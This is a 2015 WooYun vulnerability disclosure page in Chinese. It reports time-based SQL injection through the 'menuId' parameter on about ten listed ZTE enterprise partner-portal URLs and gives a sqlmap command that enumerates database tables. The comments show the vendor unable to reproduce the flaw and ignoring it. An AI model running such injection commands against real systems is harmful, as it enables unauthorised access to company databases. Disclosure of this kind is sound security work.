当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091416

漏洞标题:中兴通讯政企SQL注入漏洞大礼包(多处合集)

相关厂商:中兴通讯股份有限公司

漏洞作者: 黑暗游侠

提交时间:2015-02-10 19:03

修复时间:2015-02-15 19:04

公开时间:2015-02-15 19:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-10: 细节已通知厂商并且等待厂商处理中
2015-02-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中兴通讯政企SQL注入漏洞大礼包(多处合集)
给我20rank吧

详细说明:

条件:
1、登陆后注入
2、延时
合集:

http://enterprise.zte.com.cn/cn/partners/Prefecture/ChannelAuthentication/myApply/?menuId=2000000
http://enterprise.zte.com.cn/cn/partners/Prefecture/?menuId=0000000
http://enterprise.zte.com.cn/cn/partners/Prefecture/self_service/modify_company/?menuId=2000000 
http://enterprise.zte.com.cn/cn/partners/Prefecture/certmanager/mycerts/?menuId=2000001
http://enterprise.zte.com.cn/cn/partners/Prefecture/ChannelPartnerRegistration/MyRegistrationApplies/?menuId=2000000 
http://enterprise.zte.com.cn/cn/partners/Prefecture/self_service/pending/?menuId=2000000
http://enterprise.zte.com.cn/cn/partners/Prefecture/ChannelPartnerRegistration/ChannelRegistration/?menuId=2000000 
http://enterprise.zte.com.cn/cn/partners/channel_partner/patnersQuery/?menuId=2000000 
http://enterprise.zte.com.cn/cn/partners/Prefecture/gdServiceRequest/gdServiceQuery/?menuId=2000003
http://enterprise.zte.com.cn/cn/partners/Prefecture/gdServiceRequest/gdServiceQuery/?menuId=2000003


sqlmap.py -u "TARGET" --time-sec=60 --level 5 --no-cast -D ECC_TCM --tables

3.png


4.png

漏洞证明:

条件:
1、登陆后注入
2、延时
注射参数:
menuId=
合集:

http://enterprise.zte.com.cn/cn/partners/Prefecture/ChannelAuthentication/myApply/?menuId=2000000
http://enterprise.zte.com.cn/cn/partners/Prefecture/?menuId=0000000
http://enterprise.zte.com.cn/cn/partners/Prefecture/self_service/modify_company/?menuId=2000000 
http://enterprise.zte.com.cn/cn/partners/Prefecture/certmanager/mycerts/?menuId=2000001
http://enterprise.zte.com.cn/cn/partners/Prefecture/ChannelPartnerRegistration/MyRegistrationApplies/?menuId=2000000 
http://enterprise.zte.com.cn/cn/partners/Prefecture/self_service/pending/?menuId=2000000
http://enterprise.zte.com.cn/cn/partners/Prefecture/ChannelPartnerRegistration/ChannelRegistration/?menuId=2000000 
http://enterprise.zte.com.cn/cn/partners/channel_partner/patnersQuery/?menuId=2000000 
http://enterprise.zte.com.cn/cn/partners/Prefecture/gdServiceRequest/gdServiceQuery/?menuId=2000003
http://enterprise.zte.com.cn/cn/partners/Prefecture/gdServiceRequest/gdServiceQuery/?menuId=2000003


sqlmap.py -u "TARGET" --time-sec=60 --level 5 --no-cast -D ECC_TCM --tables

3.png


4.png

修复方案:

20rank!!!!这么多全部打包了

版权声明:转载请注明来源 黑暗游侠@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-15 19:04

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2015-02-10 19:53 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    久等了吧??一个月,哈哈

  2. 2015-02-10 23:19 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @无心、 嗯嗯

  3. 2015-02-11 09:32 | 中兴通讯股份有限公司(乌云厂商)

    正在验证,一个月啥意思,一个月才让过?

  4. 2015-02-11 10:50 | 中兴通讯股份有限公司(乌云厂商)

    @黑暗游侠,请教几个问题哈,第一,你说登录后的注入,你给的命令没有--cookie选项能行么,第二,你第二张图,132张表出现了边框,那意思是132个表你全部跑完了,请问你跑了多久。第三,你能否进一步给我提供证明细节?

  5. 2015-02-11 11:19 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @中兴通讯股份有限公司 别急,刚起床

  6. 2015-02-11 14:35 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @中兴通讯股份有限公司 回复公司:1、我的是burp的插件sqlmap跑的,cookie是集成了的,而且并不是所有提供的注入点都需要登录,我提供的是合集,部分需要登录后可注入。2、早忘了,这个漏洞是我1个月前发wooyun的,wooyun到现在才审核。。3、厂商自行测试一下,我就不再去浪费时间了,这个漏洞1个月前提交的。rank还望给力!!我知道你们运维也很苦,还不如来个20rank大家都开心。

  7. 2015-02-11 14:36 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @无心、 回复给力不

  8. 2015-02-11 15:07 | 中兴通讯股份有限公司(乌云厂商)

    @黑暗游侠,回复非常给力。但是我跑了一早上没有跑出来啊,请你给出这个点有延迟注入的截图,发送到邮箱psirt@zte.com.cn。标题为Wooyun漏洞验证

  9. 2015-02-11 15:07 | 中兴通讯股份有限公司(乌云厂商)

    @黑暗游侠,回复非常给力。但是我跑了一早上没有跑出来啊,请你给出这个点有延迟注入的截图,发送到邮箱psirt@zte.com.cn。标题为Wooyun漏洞验证

  10. 2015-02-11 17:04 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @中兴通讯股份有限公司 我一个月前提交的,截图什么的当时截图就上传的,然后早就删除了,我现在也没时间去再跑一遍了。运维大大其实你不用跑的,建议你看源码,然后手动测试后去看数据库的日志,对照日志是最简单的,而且省力,一下子就可以发现问题。

  11. 2015-02-11 17:05 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @中兴通讯股份有限公司 望支持一下洞主我发的集合,毕竟等了一个月了,20rank大家都开心下过年,其实也值20rank我合起来发的,最后祝运维大大过年开心,全家身体健康,万事如意!!!

  12. 2015-02-11 17:37 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    @黑暗游侠 感觉你好可怜。。。哈哈

  13. 2015-02-12 11:52 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @中兴通讯股份有限公司 运维大大确认了么,等着rank集市买东东呢!

  14. 2015-02-14 21:28 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @中兴通讯股份有限公司 麻烦确认下好么?N天了

  15. 2015-02-16 21:01 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @中兴通讯股份有限公司 卧槽你们良心有么?真的被你们恶心了